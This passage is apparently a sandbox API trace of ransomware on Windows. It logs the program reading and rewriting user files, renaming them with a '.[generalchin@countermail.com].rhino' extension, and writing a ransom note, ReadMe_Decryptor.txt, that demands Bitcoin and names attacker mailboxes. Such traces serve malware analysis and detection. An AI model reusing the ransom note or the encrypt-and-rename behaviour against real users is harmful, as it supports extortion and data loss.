returned 1 [0081.897] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.898] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.899] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.900] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x2cd5, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x2cd5, lpOverlapped=0x0) returned 1 [0081.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.900] GetLastError () returned 0x0 [0081.900] SetLastError (dwErrCode=0x0) [0081.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2cf8) returned 0x6ee498 [0081.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.901] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6f1198 [0082.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x717898 [0082.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f1198 | out: hHeap=0x6d0000) returned 1 [0082.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7186b0 [0082.363] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0082.363] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x744cd8 [0082.363] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7186b0 | out: hHeap=0x6d0000) returned 1 [0082.363] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x746ca0 [0082.363] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0082.363] WriteFile (in: hFile=0x124, lpBuffer=0x746cc0*, nNumberOfBytesToWrite=0x2df5, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x746cc0*, lpNumberOfBytesWritten=0x4af2ac*=0x2df5, lpOverlapped=0x0) returned 1 [0082.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x746ca0 | out: hHeap=0x6d0000) returned 1 [0082.368] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2df5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0082.368] CloseHandle (hObject=0x124) returned 1 [0082.369] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0082.369] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x6f9208 [0082.369] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0082.369] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\w7Dlby_SMcv7Lq87Z3YF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w7dlby_smcv7lq87z3yf.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\w7Dlby_SMcv7Lq87Z3YF.flv.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w7dlby_smcv7lq87z3yf.flv.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0082.370] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f9208 | out: hHeap=0x6d0000) returned 1 [0082.370] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0082.371] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0082.371] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0082.371] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0082.371] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0082.371] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0082.371] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0082.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.371] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0082.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\-_sk4.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\-_sk4.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.371] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x12691 [0082.372] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x127b1, nNumberOfBytesToLockHigh=0x0) returned 1 [0082.372] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.372] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0082.373] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.374] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x12691, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x12691, lpOverlapped=0x0) returned 1 [0082.374] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0082.374] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.374] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0082.375] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0082.375] GetLastError () returned 0x0 [0082.375] SetLastError (dwErrCode=0x0) [0082.375] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.375] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x126b4) returned 0x744cd8 [0082.375] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.375] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.376] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0082.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0082.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0082.378] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0082.378] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0082.378] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x757398 [0082.378] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0082.378] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x2230048 [0082.378] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757398 | out: hHeap=0x6d0000) returned 1 [0082.378] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2234798 [0082.378] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0082.383] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x223b278 [0082.384] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2234798 | out: hHeap=0x6d0000) returned 1 [0082.384] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x7630c0 [0082.388] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x223b278 | out: hHeap=0x6d0000) returned 1 [0082.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x2230048 [0082.389] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0082.389] WriteFile (in: hFile=0x124, lpBuffer=0x2230060*, nNumberOfBytesToWrite=0x127b1, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2230060*, lpNumberOfBytesWritten=0x4af2ac*=0x127b1, lpOverlapped=0x0) returned 1 [0082.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0082.390] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x127b1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0082.390] CloseHandle (hObject=0x124) returned 1 [0082.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0082.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0082.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0082.391] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\-_sk4.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\-_sk4.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\-_sk4.pps.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\-_sk4.pps.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0082.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0082.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0082.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0082.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0082.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fac68 [0082.392] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x6f36d0 [0082.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fac68 | out: hHeap=0x6d0000) returned 1 [0082.393] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.393] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0082.393] WriteFile (in: hFile=0x124, lpBuffer=0x279dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4af304, lpOverlapped=0x0 | out: lpBuffer=0x279dd0*, lpNumberOfBytesWritten=0x4af304*=0x2a4, lpOverlapped=0x0) returned 1 [0082.394] CloseHandle (hObject=0x124) returned 1 [0082.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\ev v7qxZKth.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\ev v7qxzkth.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.395] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x92d7 [0082.395] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x93f7, nNumberOfBytesToLockHigh=0x0) returned 1 [0082.395] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.395] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0082.396] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.397] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x92d7, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x92d7, lpOverlapped=0x0) returned 1 [0082.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0082.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0082.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0082.397] GetLastError () returned 0x0 [0082.397] SetLastError (dwErrCode=0x0) [0082.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x92fa) returned 0x744cd8 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.398] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0082.398] HeapFree (in: hHeap=0x6d0000, 